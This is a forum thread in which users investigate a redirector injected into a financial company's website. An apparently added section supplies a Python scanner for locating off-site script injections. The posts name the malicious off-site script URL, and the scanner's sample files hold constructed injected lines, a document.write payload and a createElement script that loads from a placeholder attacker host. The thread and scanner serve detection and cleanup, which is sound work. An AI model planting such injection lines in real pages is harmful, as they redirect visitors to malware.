Author Topic: AXA Financial Website was injected with JS:Illredir-CB [Trj]  (Read 8660 times)


Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1366
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
Dear All,

I just got information from my friend that one of the biggest financial providers, AXA Financial, had its website injected with JS:Illredir-CB [Trj].
avast! detected that 3 locations were infected:

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/DropDownMenuX.js" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/ie5.js" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

And from the summary of the website scanning tool, this website got the suspicious category:

http://www.unmaskparasites.com/security-report/


I need to know the exact location in their HTML where the script was injected.


« Last Edit: June 08, 2010, 03:07:02 PM by Yanto.Chiang »
Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not an avast user
« Last Edit: June 08, 2010, 11:23:12 AM by Pondus »

Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1366
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #2 on: June 08, 2010, 07:41:12 AM »
This page seems to be <suspicious>    1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.axa.co.id

Hi Pondus,

Yes, you are right, I just would like to know which part of this website was injected with the script.

cheers,
Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not an avast user
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #3 on: June 08, 2010, 07:43:38 AM »
not sure, but DavidR or Polonus will tell you when they arrive

Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1366
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #4 on: June 08, 2010, 07:50:36 AM »
not sure, but DavidR or Polonus will tell you when they arrive

Hi Pondus,

Thanks for your kind advice,

I need this because if I can contact their web administrator, it would be helpful for them.

Since their core business is financial transactions, I am afraid it would be harmful for other clients related to AXA Financial.

cheers,
Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya

Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1366
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #5 on: June 08, 2010, 09:18:20 AM »

According to Wepawet, no harmful script was found at this website:

http://wepawet.iseclab.org/view.php?hash=040f6e2c7a680c8297f10b249fd9a01d&t=1275980714&type=js

Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya

kubecj

  • Guest
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #6 on: June 08, 2010, 12:08:48 PM »
Definitely a malware redirector. Wepawet even finds the Russian link, but it's down.

Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1366
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #7 on: June 08, 2010, 02:11:52 PM »
Hi kubecj,

Thanks for your kind information and advice.

cheers,
Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #8 on: June 08, 2010, 02:48:27 PM »
Hi YantoChiang,

Make the links in your first posting so they cannot be clicked through; suspicious links should be written with wxw or htxp so the curious cannot click them and get themselves infested with malware.

If you analyze there, as kubecj pointed out to us, you would get a drop-down from here: wXw.axa.co.id/DropDownMenuX.js
to CreateElement here:  hxtp://surechip.ru:8080/google.com/google.co.ve/digitalpoint.com.php
Empty source - Could not connect to site?

polonus
« Last Edit: June 08, 2010, 07:59:34 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1366
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #9 on: June 08, 2010, 03:08:27 PM »
Hi Polonus,

I am sorry for the inconvenience caused, but I already fixed it.

By the way, do you know how to trace the location of those scripts?

Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya
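The question above (how to trace where on the site the injected script lives) is what a site owner or responder needs before the redirect chain polonus describes (an off-site script appended via createElement from DropDownMenuX.js) can be cleaned up. The following is an added example, not code from this thread, from avast!, or from any of the scanners mentioned: a small Python script that takes a saved copy of a site's HTML and JavaScript and reports the file and line of every `<script>`/`<iframe>` source, percent-encoded `document.write` payload, or dynamically created script element whose URL points to a host other than the site itself. The site host, the allowlisted CDN host, the off-site hostname and the sample file contents are all constructed placeholders.

```python
"""Report where a saved copy of a website references off-site scripts.

Added example for this thread (not avast!, Wepawet or UnmaskParasites code):
given the downloaded HTML and JavaScript files of a site, list the file and
line number of each <script>/<iframe> src, percent-encoded document.write()
payload, or dynamically created script element whose URL points to a host
other than the site itself.  SITE_HOST, ALLOWED_HOSTS, the off-site hostname
and the contents of SAMPLE_FILES are constructed placeholders.
"""
import re
from urllib.parse import unquote, urlparse

SITE_HOST = "www.example-site.test"       # constructed: the site being examined
ALLOWED_HOSTS = {"ajax.googleapis.com"}   # constructed: third parties you expect to see

# Constructed sample: a saved copy of an infected site.  index.html carries an
# encoded document.write() injection, DropDownMenuX.js appends a script element
# pointing off-site, ie5.js is clean.
SAMPLE_FILES = {
    "index.html": (
        "<html><head>\n"
        '<script src="DropDownMenuX.js"></script>\n'
        '<script src="https://ajax.googleapis.com/ajax/libs/jquery/jquery.min.js"></script>\n'
        "</head><body>\n"
        "<script>document.write(unescape('%3Cscript src=%22http://malicious.example:8080/x.php%22%3E%3C/script%3E'));</script>\n"
        "</body></html>\n"
    ),
    "DropDownMenuX.js": (
        "function DropDownMenuX(){ /* legitimate menu code */ }\n"
        "var s=document.createElement('script');s.src='http://malicious.example:8080/google.com/x.php';"
        "document.getElementsByTagName('head')[0].appendChild(s);\n"
    ),
    "ie5.js": "// legitimate browser workaround\nfunction ie5fix(){ return 1; }\n",
}

# <script src=...> / <iframe src=...> in markup (also matched after percent-decoding)
TAG_SRC = re.compile(r"<(script|iframe)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
# element.src = '...' assignments in JavaScript
JS_SRC = re.compile(r"\.src\s*=\s*[\"']([^\"']+)[\"']")
# document.createElement('script' | 'iframe') on the same line marks a dynamic injection
DYN_ELEMENT = re.compile(r"createElement\s*\(\s*[\"'](script|iframe)[\"']\s*\)", re.IGNORECASE)


def is_offsite(url, site_host=SITE_HOST, allowed=ALLOWED_HOSTS):
    """True when the URL names a host that is neither the site nor an expected third party."""
    host = urlparse(url).hostname
    if host is None:          # relative URL: served by the site itself
        return False
    return host != site_host and host not in allowed


def variants(line):
    """The raw line plus its percent-decoded form, so encoded tags become visible."""
    decoded = unquote(line)
    return (line,) if decoded == line else (line, decoded)


def scan_file(name, text, site_host=SITE_HOST, allowed=ALLOWED_HOSTS):
    """Return a list of findings {file, line, kind, url} for one saved file."""
    findings, seen = [], set()

    def record(lineno, kind, url):
        key = (lineno, url)
        if key not in seen and is_offsite(url, site_host, allowed):
            seen.add(key)
            findings.append({"file": name, "line": lineno, "kind": kind, "url": url})

    for lineno, raw in enumerate(text.splitlines(), start=1):
        for text_variant in variants(raw):
            for tag, url in TAG_SRC.findall(text_variant):
                record(lineno, f"<{tag.lower()} src>", url)
            dynamic = DYN_ELEMENT.search(text_variant) is not None
            for url in JS_SRC.findall(text_variant):
                record(lineno, "dynamic script src" if dynamic else "assigned src", url)
    return findings


def scan_files(files, site_host=SITE_HOST, allowed=ALLOWED_HOSTS):
    """Scan every saved file; same-site .js files named by a scanner belong here too."""
    findings = []
    for name, text in files.items():
        findings.extend(scan_file(name, text, site_host, allowed))
    return findings


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f'{f["file"]}:{f["line"]}  {f["kind"]}  -> {f["url"]}')
```

Run it against files saved with a non-browser fetch (so nothing executes) from an isolated machine; the output gives the file and line to hand to the site's administrator. Same-site references such as `DropDownMenuX.js` are deliberately not flagged by the markup pass, which is why the referenced `.js` files themselves must be included in the scan: in the sample, the injection in that file only shows up through the `createElement` plus `.src` pass.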

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
« Reply #10 on: June 08, 2010, 08:17:08 PM »
Hi Yanto.Chiang,

I PM-ed you with extensive instructions on how to do this safely and securely.
Good hunt,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!